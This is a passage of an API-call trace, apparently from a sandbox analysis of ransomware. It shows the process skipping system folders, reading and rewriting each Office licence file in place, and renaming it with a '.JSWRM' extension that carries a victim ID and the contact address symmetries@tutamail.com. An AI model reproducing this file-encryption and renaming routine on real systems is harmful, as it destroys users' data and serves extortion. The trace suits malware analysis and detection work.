lpUsedDefaultChar=0x0) returned 37 [0111.361] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0111.361] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProO365R_Subscription-ppd.xrm-ms", cchWideChar=37, lpMultiByteStr=0x22d0a0, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioProO365R_Subscription-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 37 [0111.361] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0111.361] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c698 [0111.361] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProO365R_Subscription-ppd.xrm-ms", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0111.361] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0111.361] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProO365R_Subscription-ppd.xrm-ms", cchWideChar=37, lpMultiByteStr=0x22d260, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioProO365R_Subscription-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 37 [0111.361] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c698 | out: hHeap=0x1e0000) returned 1 [0111.361] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0111.361] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0111.361] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0111.361] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0111.361] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0111.361] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProO365R_Subscription-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioproo365r_subscription-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0111.362] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=21412) returned 1 [0111.362] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.362] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x53a0) returned 0x24c1d0 [0111.362] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x53a0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x53a0, lpOverlapped=0x0) returned 1 [0111.365] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.365] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x53a0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x53a0, lpOverlapped=0x0) returned 1 [0111.365] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0111.365] CloseHandle (hObject=0x45c) returned 1 [0111.365] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0111.365] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0111.365] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0111.365] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0111.365] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0111.365] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0111.365] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0111.365] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0111.365] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0111.365] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0111.365] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b6a0 [0111.365] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f848 [0111.365] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b6a0 | out: hHeap=0x1e0000) returned 1 [0111.365] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0111.365] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProO365R_Subscription-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioproo365r_subscription-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProO365R_Subscription-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioproo365r_subscription-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0111.366] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f848 | out: hHeap=0x1e0000) returned 1 [0111.366] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0111.366] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0111.366] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0111.366] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0111.366] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xec370db9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xec370db9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xec4ee541, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d78, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="VisioProO365R_Subscription-ul-oob.xrm-ms", cAlternateFileName="VI61C2~1.XRM")) returned 1 [0111.366] lstrcmpiW (lpString1="VisioProO365R_Subscription-ul-oob.xrm-ms", lpString2=".") returned 1 [0111.367] lstrcmpiW (lpString1="VisioProO365R_Subscription-ul-oob.xrm-ms", lpString2="..") returned 1 [0111.367] lstrcmpiW (lpString1="VisioProO365R_Subscription-ul-oob.xrm-ms", lpString2="...") returned 1 [0111.367] lstrcmpiW (lpString1="VisioProO365R_Subscription-ul-oob.xrm-ms", lpString2="windows") returned -1 [0111.367] lstrcmpiW (lpString1="VisioProO365R_Subscription-ul-oob.xrm-ms", lpString2="recovery") returned 1 [0111.367] lstrcmpiW (lpString1="VisioProO365R_Subscription-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0111.367] lstrcmpiW (lpString1="VisioProO365R_Subscription-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0111.367] lstrcmpiW (lpString1="VisioProO365R_Subscription-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0111.367] lstrcmpiW (lpString1="VisioProO365R_Subscription-ul-oob.xrm-ms", lpString2="system volume information") returned 1 [0111.367] lstrcmpiW (lpString1="VisioProO365R_Subscription-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0111.367] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232db8 [0111.367] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProO365R_Subscription-ul-oob.xrm-ms", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0111.367] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0111.367] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProO365R_Subscription-ul-oob.xrm-ms", cchWideChar=40, lpMultiByteStr=0x22d260, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioProO365R_Subscription-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 40 [0111.367] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232db8 | out: hHeap=0x1e0000) returned 1 [0111.367] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233160 [0111.367] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProO365R_Subscription-ul-oob.xrm-ms", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0111.367] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0111.367] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProO365R_Subscription-ul-oob.xrm-ms", cchWideChar=40, lpMultiByteStr=0x22cdc8, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioProO365R_Subscription-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 40 [0111.367] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233160 | out: hHeap=0x1e0000) returned 1 [0111.367] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bf38 [0111.367] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0111.367] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0111.367] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0111.367] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b768 [0111.367] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProO365R_Subscription-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioproo365r_subscription-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0111.368] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11640) returned 1 [0111.368] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.368] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d70) returned 0x24c1d0 [0111.368] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d70, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d70, lpOverlapped=0x0) returned 1 [0111.371] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.371] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d70, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d70, lpOverlapped=0x0) returned 1 [0111.372] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0111.372] CloseHandle (hObject=0x45c) returned 1 [0111.372] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24ba88 [0111.372] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0111.372] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0111.372] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0111.372] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0111.372] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0111.372] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0111.372] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0111.372] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0111.372] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0111.372] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b8f8 [0111.372] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f158 [0111.373] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b8f8 | out: hHeap=0x1e0000) returned 1 [0111.373] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0111.373] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProO365R_Subscription-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioproo365r_subscription-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProO365R_Subscription-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioproo365r_subscription-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0111.373] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f158 | out: hHeap=0x1e0000) returned 1 [0111.374] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24ba88 | out: hHeap=0x1e0000) returned 1 [0111.374] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b768 | out: hHeap=0x1e0000) returned 1 [0111.374] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0111.374] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0111.374] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xebf91065, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xebf91065, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xec075e91, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2ba7, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="VisioProO365R_SubTest-pl.xrm-ms", cAlternateFileName="VI3883~1.XRM")) returned 1 [0111.374] lstrcmpiW (lpString1="VisioProO365R_SubTest-pl.xrm-ms", lpString2=".") returned 1 [0111.374] lstrcmpiW (lpString1="VisioProO365R_SubTest-pl.xrm-ms", lpString2="..") returned 1 [0111.374] lstrcmpiW (lpString1="VisioProO365R_SubTest-pl.xrm-ms", lpString2="...") returned 1 [0111.374] lstrcmpiW (lpString1="VisioProO365R_SubTest-pl.xrm-ms", lpString2="windows") returned -1 [0111.374] lstrcmpiW (lpString1="VisioProO365R_SubTest-pl.xrm-ms", lpString2="recovery") returned 1 [0111.374] lstrcmpiW (lpString1="VisioProO365R_SubTest-pl.xrm-ms", lpString2="perflogs") returned 1 [0111.374] lstrcmpiW (lpString1="VisioProO365R_SubTest-pl.xrm-ms", lpString2="documents and settings") returned 1 [0111.374] lstrcmpiW (lpString1="VisioProO365R_SubTest-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0111.374] lstrcmpiW (lpString1="VisioProO365R_SubTest-pl.xrm-ms", lpString2="system volume information") returned 1 [0111.374] lstrcmpiW (lpString1="VisioProO365R_SubTest-pl.xrm-ms", lpString2="msocache") returned 1 [0111.374] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0111.374] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProO365R_SubTest-pl.xrm-ms", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0111.374] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0111.374] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProO365R_SubTest-pl.xrm-ms", cchWideChar=31, lpMultiByteStr=0x240f48, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioProO365R_SubTest-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 31 [0111.374] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0111.374] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d800 [0111.374] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProO365R_SubTest-pl.xrm-ms", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0111.374] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0111.374] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProO365R_SubTest-pl.xrm-ms", cchWideChar=31, lpMultiByteStr=0x2410d8, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioProO365R_SubTest-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 31 [0111.374] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d800 | out: hHeap=0x1e0000) returned 1 [0111.374] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0111.374] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bf38 | out: hHeap=0x1e0000) returned 1 [0111.374] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0111.374] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0111.374] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0111.374] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProO365R_SubTest-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioproo365r_subtest-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0111.375] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11175) returned 1 [0111.375] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.375] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2ba0) returned 0x24c1d0 [0111.375] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2ba0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2ba0, lpOverlapped=0x0) returned 1 [0111.389] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.389] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2ba0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2ba0, lpOverlapped=0x0) returned 1 [0111.389] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0111.389] CloseHandle (hObject=0x45c) returned 1 [0111.389] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0111.389] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0111.389] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0111.389] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0111.389] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0111.390] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0111.390] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0111.390] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0111.390] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0111.390] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0111.390] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0111.390] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e7a0 [0111.390] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0111.390] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0111.390] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProO365R_SubTest-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioproo365r_subtest-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProO365R_SubTest-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioproo365r_subtest-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0111.392] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e7a0 | out: hHeap=0x1e0000) returned 1 [0111.392] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0111.392] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0111.392] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0111.392] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0111.392] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xebf6ae01, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xebf6ae01, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xec04fc30, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x51b9, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="VisioProO365R_SubTest-ppd.xrm-ms", cAlternateFileName="VI226D~1.XRM")) returned 1 [0111.392] lstrcmpiW (lpString1="VisioProO365R_SubTest-ppd.xrm-ms", lpString2=".") returned 1 [0111.392] lstrcmpiW (lpString1="VisioProO365R_SubTest-ppd.xrm-ms", lpString2="..") returned 1 [0111.392] lstrcmpiW (lpString1="VisioProO365R_SubTest-ppd.xrm-ms", lpString2="...") returned 1 [0111.392] lstrcmpiW (lpString1="VisioProO365R_SubTest-ppd.xrm-ms", lpString2="windows") returned -1 [0111.392] lstrcmpiW (lpString1="VisioProO365R_SubTest-ppd.xrm-ms", lpString2="recovery") returned 1 